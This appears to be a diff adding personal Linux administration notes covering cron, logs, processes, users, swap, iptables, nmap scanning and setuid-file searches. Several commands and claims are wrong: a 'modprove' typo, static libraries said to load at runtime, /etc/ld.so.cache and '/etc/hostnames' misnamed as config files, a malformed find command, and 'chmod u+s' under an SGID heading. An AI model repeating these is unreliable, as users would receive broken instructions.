Count from 4 to 11.
> seq 4 11
Count from 1 to 100 in steps of 5.
> seq 1 5 100

44
fundamentals/cron.md Normal file
View File

@ -0,0 +1,44 @@
Anacron manages crontabs which might not have run because the machine was turned off. The first value shows the days between runs, the second shows how many minutes to wait after a boot to run.
For example:
> cat /etc/anacrontab
`7 15 cron.daily run-parts --report /etc/cron.daily`
This would run crontab every 7 days, and wait 15 minutes until after boot to run.
Various services from cron exist, e.g.
> sudo apt -y install cronie
start the cronie with
> sudo systemctl start cronie
start a cron with
> cron -e
You can run a script with:
*/10 * * * * /home/pi/script.sh
... which would run every 10 minutes.
To run something as root, do:
> sudo crontab -e
For example, you can update the database, meaning searches with 'locate' command will be faster.
> */30 * * * * /usr/bin/updatedb
# Testing with runparts
Run-parts runs all executable scripts in a directory.
> run-parts /etc/cron.hourly

21
fundamentals/defaults.md Normal file
View File

@ -0,0 +1,21 @@
Change defaults with the `update-alternatives` command.
> sudo update-alternatives --config x-www-browser
Other defaults include:
* x-cursor-theme
* x-session-manager
* x-terminal-emulator
* x-window-manager
* x-www-browser
# Config Location
The appropriate files are located in /etc/alternatives/x-*

24
fundamentals/hardware.md Normal file
View File

@ -0,0 +1,24 @@
# Motherboard information
> sudo dmidecode
Motherboard info, upgrading BIOS, memory capacity, LAN connections.
# Disk Format information
> df
> df -h
# CPU
> cat /proc/cpuinfo
# Displays
xrandr, probably.
List displays ...
> xrandr --query

12
fundamentals/kernel.md Normal file
View File

@ -0,0 +1,12 @@
# Living Space
Kernel modules live in lib/modules/$(uname -r)
Load them with
> sudo modprobe ath9k
Or remove one with
> sudo modprove uvcvideo

15
fundamentals/keyboard.md Normal file
View File

@ -0,0 +1,15 @@
# Set Layout
Set layout to British English.
> setxkbmap -layout gb
| Language | short |
|:--------|:------|
| Polish | pl |
| Serbian | rs |
Set 'alt + shift', as the command which cycles through the British English, Polish and Serbian keyboard layout.
> setxkbmap -layout gb,pl,rs -option grp:alt_shift_toggle

10
fundamentals/kill.md Normal file
View File

@ -0,0 +1,10 @@
# Basic Signals
To see an ordered list of termination signals:
> kill -l
1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP
6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1
11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM

8
fundamentals/links.md Normal file
View File

@ -0,0 +1,8 @@
Link from X to Y.
> ln -s X ../otherdir/Y
Links cause ownership headaches. Solve this with -h:
> chown -h user1 mysymlink

40
fundamentals/locale.md Normal file
View File

@ -0,0 +1,40 @@
A list of supported locales is available at /usr/share/i18n/SUPPORTED
See a full list with:
> cat /usr/share/i18n/SUPPORTED
Take the first portion to generate full locale information for a region:
> locale-gen ru_RU.UTF-8
Then use this for the current shell session with
> LANG=ru_RU.utf8
Expand this to the entire system with:
> export LANG=ru_RU.utf8
You can make this permanent for one user by adding this line to the ~/.profile or ~/.bashrc.
Make it permanent for the entire system by editing:
> sudo vim /etc/defaults/locale
# Variables
While generally set together, the variables setable are:
| Variable | Description |
|:-------------:|:------------|
| LC_TIME | Date and time |
| LC_NUMERIC | Nonmonetary numeric formats |
| LC_PAPER | A4 vs wrong paper |
| LC_ADDRESS | Address formats, for those amazingly concise Polish addresses. |
| LC_TELEPHONE | Telephone number formats. |
| LC_MEASUREMENT | Metric or Imperial, but no Impetric available. |
| LC_IDENTIFICATION | Metadata about the locale information |
| LC_ALL | Just everything at once. |

20
fundamentals/locating.md Normal file
View File

@ -0,0 +1,20 @@
# Quick Search for Files
`locate file*`
Locate is fast because it only accesses a database of files which it regularly updates. You can update this with:
`sudo updatedb`
# Whereis
`whereis angband`
... shows where the angband program is, along with configuration files, and binaries.
Also `which` shows where a binary file is, and `type` shows aliases.
`which cmus`
`type cmus`

57
fundamentals/logs.md Normal file
View File

@ -0,0 +1,57 @@
# Syslog Management Protocols
Let's look at the programs filling in things on our /var/log/ directory.
* rsyslog (common)
* syslog (old)
* syslog-ng (lots of content-based filtering)
* klogd (kernel-focussed)
# `rsyslog`
The config rests in /etc/rsyslog.conf, which then references /etc/rsyslog.d/.
# Systemd
This thing makes its own logs with journald, and the journal's own logging system writes to /var/log/journal/ directory, which is then filled with nonsense.
You can obtain nonsense in systemd's own format by entering:
journalctl -e
This thing generates so much nonsense it can crash your system, but can at least be checked with:
> journalctl --disk-usage
... in case you can't remember the `du` command.
You can limit the nonsense by editing the /etc/systemd/journald.conf file, and finding `#SystemMaxFileSize=`
# Logger
You can log things at any time with the logger:
> logger Server is being a dick!
Put things into a specific log with `-p`. They can enter into, e.g., lpr (printer) log file with a priority of "critical", with:
> logger -p lpr.crit Help!
Logfiles rotate around and eventually get deleted. Rotation means they get compressed.
Edit the config in /etc/logrotate.conf.
A few apps have their own special log rotation rules, kept in /etc/logrotate.d/.
The major variables to change are `weekly`, which compresses log files weekly, and `rotate 4`, which keeps 4 weeks worth of backlogs before deletion.
# Force Log Rotation
> sudo systemctl kill --kill-who=main --signal=SIGUSR2 systemd-journald.service
or just
> sudo systemctl restart systemd-journald.service

48
fundamentals/packages.md Normal file
View File

@ -0,0 +1,48 @@
# Looking
Your package has something to do with unzipping. Find out more:
> apropos unzip
# Maintenance
> dpkg -l
List what's installed.
# Libraries
Libraries under /lib/ typically contain an .so suffix when they're dynamic. It means 'shared object' as a number of programs will refer to it.
Others will have an /a/ suffix, meaning that they're static, and will be loaded at runtime.
We can check the dependencies of a program using the ldd command upon anything in a library. For example:
> ldd/usr/bin/md5sum
... shows us that md5sum depends upon:
- linux-vdso.so.1
- libc.so.6
- lib64/ld-linux-x86-64.so.2
To list all libraries, run:
> ldconfig -p
For example, if looking at /usr/lib/x86_64-linux-gnu/libXcomposite.so.1, we might wonder what it's for. We can then run:
> ldconfig -p | grep libXcomposite
... and find out nothing except that it redirects /usr/lib/x86...
So at least we know where it is.
> ldconfig -p | grep usb
... this will show where things which nominally relate to usbs live.
You can add to the libarary path by putting just any text file in /etc/ld.so.cache, e.g. in Arch where the path to the fakeroot environment is placed there.

16
fundamentals/pam.md Normal file
View File

@ -0,0 +1,16 @@
The Pluggabble Authentication Module controls minimum security requirements, such as password lengths.
Configuration rests in `/etc/pam.d/common-password`, or sometimes `system-auth`.
The file might be edited to contain:
```
password required pam_cracklib.so minlen=12 lcredit=1
ucredit=1 dcredit=2 ocredit=1
```
This would enforce a minimum length of 12 characters for a password, one lowercase character, one upper case character, two digits, and one other (special) character.

74
fundamentals/processes.md Normal file
View File

@ -0,0 +1,74 @@
# Free
See free space with:
> free
and make it human readable with:
> free -h
Or `-m` for megabytes.
# Proccesses
See running items in current terminal with
> ps
or more with
> ps -a
Or the entire system with
> ps -e
Or the entire system with more information, BSD style, with:
> ps aux
And then search for a particular program with
> ps aux | grep cmus
# Jobs
Pause a job with ^z. Put it in the background with the '&' suffix.
List jobs in the current shell with
> jobs
And then you can pull number 1 up again with
> fg 1
Or continue running a stopped job with:
> bg 1
# Nice
This changes how nice a program is, from -20 (horrid) to 19.
Install a program, but nicely, at nice value '10':
> nice -10 sudo apt -y install libreoffice
Aggressively use Steam, with a nice value of '-13'.
> nice --13 steam&
Find out that Steam's fucking everything up, so you change its nice value with 'renice':
> renice --5 -p 3781
Nerf all of roach-1's processes:
> renice 10 -u roach-1
... or the entire group
> renice -14 -g hackers

36
fundamentals/shell.md Normal file
View File

@ -0,0 +1,36 @@
# Shells
Dash - fast but limited funcionality, great for scripts.
sh - primitive and ubiquitous.
bash - the standard
elvish - user-friendly, but new, with a full file-browser embedded into the system.
# Login
All shells launch either as login or non-login. All remote sessions without a GUI withl require authentication, and therefore will be login.
## Login
These shells start by reading /etc/profile then the first of ~/.bash_profile, ~/.bash_login or ~/.profile, and load all given values.
## Non-Login
Non-login shells will read /etc/bash.bashrc and then the ~/.bashrc file. You can summon the different shell perameters with the command `.`.
For example, so summon the file ~/.bashrc, you can perform:
`. ~/.bashrc`
How the logout is handled depends upon ~/.bash_logout
# Defaults
The default shell config files to create for a new user are under /etc/skel.
# Shellcheck
Run `shellcheck script.sh` on your scripts to check them for mistakes.

45
fundamentals/swap.md Normal file
View File

@ -0,0 +1,45 @@
# Making a Swap File
> sudo mkdir -v /var/cache/swap
> cd /var/cache/swap
> sudo dd if=/dev/zero of=swapfile bs=1K count=4M
This creates a swapfile of (1k x 4M) 4 Gigs.
Change 4M to XM for an XGig swap.
> sudo chmod 600 swapfile
> sudo mkswap swapfile
> sudo swapon swapfile
Test it's working with top
> top -bn1 | grep -i swap
or:
> echo "/var/cache/swap/swapfile none swap sw 0 0" | sudo tee -a /etc/fstab
Test it'll work at boot with:
> sudo swapoff swapfile
> sudo swapon -va
# Partition Swaps
Put this in /etc/fstab:
`UUID=blah-blah none swap sw 0 0`
Then test it works with:
> sudo swapon -va
Test other partitions in fstab with:
> sudo mount -a

62
fundamentals/time.md Normal file
View File

@ -0,0 +1,62 @@
# systemd
Set time to synchronize with an ntp server:
> timedatectl set-ntp true
This info stays in /usr/share/zoneinfo
# Local Time
Local time is kept in /etc/localtime.
According to Dave's LPIC guide, you can set the local time by making asymboling link from your timezone to /etc/localtime, as so:
> sudo ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
...however this produced the wrong time for me. Further, /etc/localtime produces an output with cat, while the zoneinfo files do not.
# Locale
See local time, language and character settings with:
> locale
List available locales with:
> locale -a
To see additional locales which are available (but not necessarily installed):
> cat /usr/share/i18n/SUPPORTED
Set a supported locale with:
> locale-gen pl_PL.UTF-8
Then set that language, with:
> LANG=pl_PL.UTF-8
... then reboot.
# Network Time Protocol
Enter the shell with:
> ntpq
Or just glimpse and overview with:
> ntpq -q
This clock can drift, which is then listed under /var/log/ntp.drift
The config is under /etc/ntp.conf. If a line for the stats directory is listed, it'll log stats, e.g.:
`statsdir /var/log/ntpstats/`
This can show if clock drift occurs.
The config file also lets you specify servers to obtain time from.

56
fundamentals/users.md Normal file
View File

@ -0,0 +1,56 @@
See list of logged on users.
> w
See last logons:
> last
or all logon attempts, including bad attempts:
> lastb
List recently accessed files:
> last -d
See files opened by steve
> lsof -t -u steve
See files opened by anyone but steve
> lsof -u ^steve
Fuser can also track people loggingin:
> fuser /var/log/syslog
... and fuser can kill everything accessing the home directory:
> fuser -km /home
# Looking for dodgy files
Some files can be executed by people as if they had super user permissions, and that's okay... sometimes.
Let's start with files executable by user:
> sudo find / -type f -perm -g=s -ls
And then those executable by the group:
> find / -type f -perm -g=s -ls
And finally, worrying files, executable by anyone as if sie were the owner:
> find / -xdev \( -o -nogroup \) -print
Then have a look at resource usage per user.
#SGID
> sudo chmod u+s process.sh
This will modify process.sh to that instead of being simply executable, anyone executing it will have the permissions as if owner while executing it.

60
fundamentals/wifi.md Normal file
View File

@ -0,0 +1,60 @@
# Netstat Stuff
iftop -p -n
Stats on local net usage within domain.
whois domain.com
dig domain.com
info on domain, whether it's taken, et c.
> ifconfig
Like ipconfig.
> nmcli
Versatile wifi tool.
# Examples
You want to connect to the internet.
>sudo iwconfig
Get knowledge of wireless state. The output might be:
`wlp3s0 IEEE 802.11 ESSID:"Gandalf WajFaj"`
`Mode:Managed Frequency:2.412 GHz Access Point: 10:05:01:90:AC:1A`
`Bit Rate=144.4 Mb/s Tx-Power=15 dBm`
`Retry short limit:7 RTS thr:off Fragment thr:off`
`Encryption key:off`
`Power Management:on`
`Link Quality=64/70 Signal level=-46 dBm`
`Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag`
`Tx excessive retries:0 Invalid misc:363 Missed beacon`
This tells you that your ESSID is 'Gandalf WajFaj', and the access point name is 10:05:......
> nmcli radio
You get an overview of your radio devices. You're told that eth0 deals with your ethernet and wlan0 deals with wifi. wlan0 is a file which represents your wifi device.
> nmcli wlan0 wifi rescan
> nmcli device wifi list
Now to connect.
> nmcli device wifi connect [SSID] [your password] [wifi password]
Alternatively, you can use
> nmcli -ask device wifi connect [SSID]
And it'll ask for your password, so you're not typing it in in full view.

4
hardware/brightness.md Normal file
View File

@ -0,0 +1,4 @@
# Brightness
/sys/class/backlight/*/brightness

8
hardware/monitor.md Normal file
View File

@ -0,0 +1,8 @@
See screen size
> xrandr -q
Automatically configure:
> xrandr --auto

36
hardware/printers.md Normal file
View File

@ -0,0 +1,36 @@
# Cups: The Common Unix Printing System
Configure cups at /etc/cups/supsd.conf, or visit the local webpage at http://localhost:631 if you want to use the Apple interface, otherwise, it's the printing daemon.
# The Printing Daemon
The printing daemon automatically reads the cups configuration file. It prints with:
> lp mytext.txt
Find a list of printers with:
> lpq
You can specify a printer with `-d`:
> lp -d DCP7060D article.pdf
Alternatively, if you see a printer number, cancel job 33 with:
> lprm 33
or just cancel all jobs:
> lprm -
See printers on network:
> lpstat -a
Block or accept all jobs with:
> cupsreject DCP7060D
> cupsaccept DCP7060D

90
networking/basics.md Normal file
View File

@ -0,0 +1,90 @@
# Protocols
| TCP | UDP | ICMP |
|:-----------------|:-----------------|:------------------|
|Transmission Control Protocol | User Datagram Protocol | Internet Control Message Protocol |
| Reliable and slow. | Fast but unreliable, such as VOIP. Provides checksums. | Dirty checks such as pings. |
# Networking Addressing
## IPv4
Three address ranges pertain only to private networks, so no computer looks beyond the local router to resolve them:
10.0.0.0 to 10.255.255.255
172.16.0.0 to 172.31.255.255
192.168.0.0 to 192.168.255.255
In theory, networks should fall within one of 3 ranges, depending upon their first octet:
Class A 1-127
Class B 128 to 191
Class C 192 to 223
# Service Ports
There are three types of port ranges:
1 to 1023: Well-known and established ports.
1024 to 49151 ICANN registered ports, used by various products, with limited oversight.
49152 to 65535 Dynamic ports for ad hoc use.
View a more complete list of ports with:
> less /etc/services
# ip
Show all addresses with:
> ip a{dd{ress}} s{how}
If a link's not present, load it with:
sudo ip link set dev wlp3s0 up
Add an interface to a device as so:
> sudo ip a add 192.168.0.15/255.255.255.0 dev eth1
See network interfaces available on Fedora with:
> less /etc/sysconfig/network-scripts/ifcfg-enp2s0f0
or on Debian with:
> less /etc/network/interfaces
Mostly, interfaces will receive automatic addresses from a DHCP server. If this hasn't happened for you, you can request a dhcp address with:
> sudo dhclient eth1
View your current route to the internet with:
> route
... although on void this is:
> routel
If you don't have a route to the internet, you can manually specify the default gateway with:
> sudo route add default gw 192.168.0.1
... or ...
> sudo ip route add default via 192.168.0.1

22
networking/dns.md Normal file
View File

@ -0,0 +1,22 @@
# Designate DNS
On Debian, a file might gain DNS services by adding the following to /etc/network/interfaces:
----------------
auto eth0
iface eth0 inet static
address 10.0.0.23
netmast 255.255.255.0
gateway 10.0.0.1
dns-nameservers 208.67.222.222 208.67.220.220
dns-search example.com
----------------
# URL Aliases
To change where hosts go, edit /etc/hostnames. You can enter, e.g.:
`54.239.25.200 www.amazon.com a`
... which then means simply the letter 'a' will lead you to amazon.com.

20
networking/fail2ban.md Normal file
View File

@ -0,0 +1,20 @@
# SSH Daemon Jail
> sudo vim /etc/fail2ban/jail.d/ssh.local
```
[sshd]
enabled = true
ignoreip = 127.0.0.1/8 ::1,192.168.0.0/16 ::1
```
> sudo systemctl restart fail2ban
> sudo fail2ban-client status
> sudo fail2ban-client status sshd

View File

@ -0,0 +1,12 @@
[ One ] { fill: seagreen; color: white; } -- label --> [ Two ] { shape: triangle; }
[ One ] => { arrow-style: closed; } [ Three ]
[ Five ] { fill: maroon; color: yellow; } <=> [ Three ]
[ One ] .. Test\n label ..> [ Four ]
[ Three ] { border-style: dashed; }
.. Test\n label ..> { arrow-style: closed; } [ Six ] { label: Sixty\n Six\nand\nsix; }
[ Seven ] -- [ Eight ]
[ Five ] --> [ Eight ]
[ Five ] --> [ Seven ]
[ Two ] -> [ Four ]
[ Three ] <-- Test label --> { arrow-style: closed; } [ Six ]
[ Eight ] .. [ None ] { shape: none; fill: red; color: brown; }

53
networking/iptables.md Normal file
View File

@ -0,0 +1,53 @@
# Intro
This is a basic Linux firewall program.
Look at your firewalls:
> iptables -L
We see the output of input, output and forwarding rules.
# Forward
I don't need any forwarding, so I'm going to drop all forwarding:
> iptables -P FORWARD DROP
# Input
Let's 'A'dd, or 'A'ppend a rule with -A. Let's drop all input from a nearby IP
> iptables -A INPUT -s 192.168.0.23 -j DROP
Or we can block all input from a particular port on the full network.
> iptables -A INPUT -s 192.168.0.0/24 -p tcp --destination-port 25 -j DROP
> iptables -A INPUT --dport 80 -j ACCEPT
This allows http traffic to an Apache web server over port 80.
However, rules are accepted in order - so a packet cannot be rejected and then accepted.
To delete rule 2 from the INPUT chain:
> iptables -D INPUT 3
Alternatively, you can 'I'nsert a rule at the start, rather than 'A'ppending it.
> iptables -I INPUT -s 192.168.0.13 DROP
# Catchalls
Catchall rules state that anything which is not permitted is forbidden. They must be allowed last.
# -Jurice-Diction
The -j flag accepts ACCEPT/REJECT/DROP. The last two are identical except that "REJECT" acknowledges the rejection.
Flush all existing rules with:
> iptables -F

View File

@ -0,0 +1,19 @@
#!/bin/sh
# Allow all loopback (lo0) traffic and drop all traffic to 127/8
# that doesn't use lo0
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -d 127.0.0.0/8 ! -i lo -j REJECT --reject-with icmp-port-unreachable
# Allow established sessions to receive traffic
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Allow ICMP pings
iptables -A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
# Allow SSH remote
iptables -I INPUT -p tcp --dport 22 -j ACCEPT
# Reject all other inbound connections
iptables -A INPUT -j REJECT --reject-with icmp-port-unreachable
iptables -A FORWARD -j REJECT --reject-with icmp-port-unreachable

View File

@ -0,0 +1,52 @@
# Intro
This is a basic Linux firewall program.
Look at your firewalls:
> iptables -L
We see the output of input, output and forwarding rules.
# Forward
I don't need any forwarding, so I'm going to drop all forwarding:
> iptables -P FORWARD DROP
# Input
Let's 'A'dd, or 'A'ppend a rule with -A. Let's drop all input from a nearby IP
> iptables -A INPUT -s 192.168.0.23 -j DROP
Or we can block all input from a particular port on the full network.
> iptables -A INPUT -s 192.168.0.0/24 -p tcp --destination-port 25 -j DROP
> iptables -A INPUT --dport 80 -j ACCEPT
This allows http traffic to an Apache web server over port 80.
However, rules are accepted in order - so a packet cannot be rejected and then accepted.
To delete rule 2 from the INPUT chain:
> iptables -D INPUT 3
Alternatively, you can 'I'nsert a rule at the start, rather than 'A'ppending it.
> iptables -I INPUT -s 192.168.0.13 DROP
# Catchalls
Catchall rules state that anything which is not permitted is forbidden. They must be allowed last.
# -Jurice-Diction
The -j flag accepts ACCEPT/REJECT/DROP. The last two are identical except that "REJECT" acknowledges the rejection.
Flush all existing rules with:
> iptables -F

11390
networking/ldap/guide.html Normal file

File diff suppressed because it is too large Load Diff

17
networking/nmap.md Normal file
View File

@ -0,0 +1,17 @@
Example:
> nmap 192.168.1.1/24
Flags:
| Flag | Meaning | Effect |
| :---| :---| :---|
| -F | Fast | First 100 ports only |
Look for a web server, which has ports 80 and 443 open:
> nmap 192.168.1.1/24 -p 80,443 --open

View File

@ -0,0 +1,27 @@
# List Out DNS
> echo "addn-hosts=/etc/pihole/lan.list" | sudo tee /etc/dnsmasq.d/02-lan.conf
Then edit that list
> sudo vim /etc/dnsmasq.d/02-lan.conf
`192.168.0.10 ratking.lan ratking`
Then restart the pihole's dns:
> sudo pihole restartdns
#View DNS traffic
> pihole -t
#Change password
> pihole -a -p
# Get new list of cancer
> pihole -g

5
networking/pip.md Normal file
View File

@ -0,0 +1,5 @@
Upgrade all packages
> pip freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip install -U

Some files were not shown because too many files have changed in this diff Show More